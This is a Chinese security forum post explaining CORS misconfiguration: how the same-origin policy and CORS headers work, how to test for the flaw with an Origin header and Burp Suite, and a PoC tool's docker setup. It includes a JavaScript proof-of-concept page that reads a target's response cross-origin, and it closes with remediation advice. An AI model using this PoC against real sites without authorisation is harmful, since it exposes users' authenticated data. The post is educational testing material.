CORS讲解与实战利用

zxl2605   ·   发表于 2023-07-16 22:36:18   ·   技术文章

产生原因

同源策略:如果两个URL的协议、域名、端口号都相同,就称这两个URL同源。

同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从一个子域传递到另一个子域,或者在不同域之间进行传递(例如将访问令牌和会话标识符,传递给另一个应用程序)。

为了允许跨域通信,开发人员必须使用不同的技术来绕过SOP并传递敏感信息,以至于现今也成为了一个棘手的安全问题。因此,为了在不影响应用程序安全状态的情况下实现信息共享,在HTML5中引入了跨源资源共享(CORS)。但问题也随之而来,许多人为了方便干脆直接使用默认的配置,或是由于缺乏对此的了解而导致了错误的配置。

CORS跨域资源共享

CORS,跨域资源共享(Cross-origin resource sharing),这种机制通过添加HTTP字段的方式规定服务器资源允许被哪些域访问(Access-Control-Allow-Origin)、请求中是否允许发送cookie(Access-Control-Allow-Credentials)、哪些请求类型是被允许的(Access-Control-Request-Method)等等。

手工验证方式

在正常的api请求处,headers加入”origin”:”http://xx.xx.xx.xx“, 如果接口正常返回了数据且headers里包含

1 access-control-allow-credentials : true
2 access-control-allow-origin : http://xx.xx.xx.xx
就说明这个接口确实存在CORS漏洞

实战技巧

使用burpsuite
选择Proxy模块中的Options选项,找到Match and Replace这一栏,勾选Request header 将空替换为Origin:foo.example.org的Enable框。


HTTP history列表中出现符合条件的请求包,发送到Repeater中,点击GO,若存在如下图所示,即该处可能有CORS漏洞。

响应包组合应是这种(存在CORS):

  1. Access-Control-Allow-Origin: foo.example.org
  2. Access-Control-Allow-Credentials: true

注意!如下组合是没有漏洞的。因为浏览器已经会阻止如下配置。(不存在CORS)

  1. Access-Control-Allow-Origin: *
  2. Access-Control-Allow-Credentials: true

利用效果:

实战:

抓包发现请求头中存在Origin,将其修改为*

发现Access-Control-Allow-Origin:返回的*

该处的数据包,所有域可以访问本域的资源。说明该接口可能存在CORS漏洞

以GET的形式POC

  1. <!DOCTYPE>
  2. <html>
  3. <script type="text/javascript">
  4. function loadXMLDoc()
  5. {
  6. var xhr = new XMLHttpRequest();
  7. xhr.onreadystatechange=function()
  8. {
  9. if(xhr.readyState == 4 && xhr.status == 200) //if receive xhr response
  10. {
  11. var datas=xhr.responseText;
  12. alert(datas);
  13. }
  14. }
  15. //request vuln page
  16. xhr.open("GET","http://www.target.com","true") //网页地址
  17. xhr.send();
  18. }
  19. loadXMLDoc();
  20. </script>
  21. </html>

不存在CORS漏洞的情况下

当进行利用的时候,爆出底下红色部分时。


则不存在CORS,不允许跨域。

工具推荐

下载地址:https://github.com/0verSp4ce/PoCBox

docker安装:

拉取镜像:
docker pull registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
运行:
docker container run -d -p 76:80 registry.cn-hangzhou.aliyuncs.com/pocbox/pocbox:1.0
访问:
http://ip:76
本地搭建好后在图示处填入相关数据后即可生成poc code


利用过程:


效果图。

其中CORS漏洞存在GET方式和POST方式,具体根据实战情况。

修复建议

1、关闭非正式开启的CORS
2、白名单限制:定义“源”的白名单,避免使用正则表达式,不要配置Access-Control-Allow-Origin为通配符*或null,严格效验来自请求数据包中Origin的值
3、仅允许使用安全协议,避免中间人攻击

用户名金币积分时间理由
Track-魔方 1300.00 0 2023-07-19 11:11:15 深度200 普适300 完整性200 稀缺度100 唯一平台500

打赏我,让我更有动力~

0 条回复   |  直到 2023-7-16 | 679 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.